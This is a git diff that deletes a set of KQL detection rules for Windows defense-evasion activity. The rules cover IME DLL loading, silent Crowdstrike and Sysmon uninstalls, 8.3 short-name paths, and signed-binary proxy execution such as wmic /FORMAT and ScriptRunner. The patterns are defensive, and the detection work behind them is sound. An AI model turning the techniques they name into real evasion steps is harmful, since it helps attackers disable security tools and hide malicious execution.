diff --git a/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql b/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql
deleted file mode 100644
index 3f6b0cac..00000000
--- a/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/21
-// Level: high
-// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Control\\Keyboard Layouts" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime"))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql b/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql
deleted file mode 100644
index 44d89cab..00000000
--- a/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/04
-// Level: high
-// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql b/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql
deleted file mode 100644
index 141841a4..00000000
--- a/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseph Kamau
-// Date: 2024/05/27
-// Level: high
-// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon.
-Which could be an indicator of "User Defined Functions" abuse to download malware.
-
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql b/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql
deleted file mode 100644
index 167db3f4..00000000
--- a/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/21
-// Level: high
-// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Svchost_Parent_Process.kql b/Defense Evasion/Uncommon_Svchost_Parent_Process.kql
deleted file mode 100644
index 34b8d2cc..00000000
--- a/Defense Evasion/Uncommon_Svchost_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/08/15
-// Level: medium
-// Description: Detects an uncommon svchost parent process
-// Tags: attack.defense_evasion, attack.t1036.005
-DeviceProcessEvents
-| where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql b/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql
deleted file mode 100644
index ca6bca6f..00000000
--- a/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/12
-// Level: medium
-// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge"))
\ No newline at end of file
diff --git a/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql b/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql
deleted file mode 100644
index 996ee87c..00000000
--- a/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/12
-// Level: high
-// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet"
\ No newline at end of file
diff --git a/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql b/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql
deleted file mode 100644
index 7d3b2fa9..00000000
--- a/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/12
-// Level: high
-// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/Defense Evasion/Unmount_Share_Via_Net.EXE.kql b/Defense Evasion/Unmount_Share_Via_Net.EXE.kql
deleted file mode 100644
index db69455f..00000000
--- a/Defense Evasion/Unmount_Share_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2020/10/08
-// Level: low
-// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql b/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
deleted file mode 100644
index 61f33107..00000000
--- a/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/31
-// Level: medium
-// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql b/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql
deleted file mode 100644
index a0050001..00000000
--- a/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/18
-// Level: medium
-// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql b/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql
deleted file mode 100644
index 5cf32ab1..00000000
--- a/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql b/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql
deleted file mode 100644
index cea6c506..00000000
--- a/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/06
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql b/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
deleted file mode 100644
index 827d695b..00000000
--- a/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/10
-// Level: medium
-// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql b/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql
deleted file mode 100644
index 23a837f9..00000000
--- a/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/07
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe", "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe")) or (InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veam.backup.shell.exe" or InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe") or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\" or (ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe" or ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Short_Name_Path_in_Image.kql b/Defense Evasion/Use_Short_Name_Path_in_Image.kql
deleted file mode 100644
index 0ff162d4..00000000
--- a/Defense Evasion/Use_Short_Name_Path_in_Image.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/07
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Remote.exe.kql b/Defense Evasion/Use_of_Remote.exe.kql
deleted file mode 100644
index 58ed2620..00000000
--- a/Defense Evasion/Use_of_Remote.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/02
-// Level: medium
-// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Scriptrunner.exe.kql b/Defense Evasion/Use_of_Scriptrunner.exe.kql
deleted file mode 100644
index 0c832c20..00000000
--- a/Defense Evasion/Use_of_Scriptrunner.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Setres.exe.kql b/Defense Evasion/Use_of_Setres.exe.kql
deleted file mode 100644
index 8d88bcb7..00000000
--- a/Defense Evasion/Use_of_Setres.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/12/11
-// Level: medium
-// Description: Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path
-// Tags: attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where FolderPath endswith "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_TTDInject.exe.kql b/Defense Evasion/Use_of_TTDInject.exe.kql
deleted file mode 100644
index c40854dd..00000000
--- a/Defense Evasion/Use_of_TTDInject.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/16
-// Level: medium
-// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql b/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql
deleted file mode 100644
index a392ba2f..00000000
--- a/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: medium
-// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql b/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql
deleted file mode 100644
index 3179a894..00000000
--- a/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/01
-// Level: medium
-// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Wfc.exe.kql b/Defense Evasion/Use_of_Wfc.exe.kql
deleted file mode 100644
index b0bfabe4..00000000
--- a/Defense Evasion/Use_of_Wfc.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/01
-// Level: medium
-// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql b/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql
deleted file mode 100644
index a0582a37..00000000
--- a/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Anton Kutepov, oscd.community
-// Date: 2020/02/05
-// Level: high
-// Description: Detects using SettingSyncHost.exe to run hijacked binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1574.008
-DeviceProcessEvents
-| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath")
\ No newline at end of file
diff --git a/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql b/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql
deleted file mode 100644
index 7ffb6536..00000000
--- a/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/28
-// Level: medium
-// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin "
\ No newline at end of file
diff --git a/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql b/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql
deleted file mode 100644
index df845624..00000000
--- a/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects when verclsid.exe is used to run COM object via GUID
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql b/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql
deleted file mode 100644
index cd684dd2..00000000
--- a/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/07
-// Level: high
-// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceProcessEvents
-| where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql b/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
deleted file mode 100644
index 76373e3d..00000000
--- a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql b/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
deleted file mode 100644
index 275a6408..00000000
--- a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2023/04/11
-// Level: medium
-// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql b/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql
deleted file mode 100644
index 0a3175de..00000000
--- a/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/17
-// Level: medium
-// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
-// Tags: attack.defense_evasion, attack.t1220
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe"
\ No newline at end of file
diff --git a/Defense Evasion/WSL_Child_Process_Anomaly.kql b/Defense Evasion/WSL_Child_Process_Anomaly.kql
deleted file mode 100644
index 83b49b76..00000000
--- a/Defense Evasion/WSL_Child_Process_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/23
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql b/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql
deleted file mode 100644
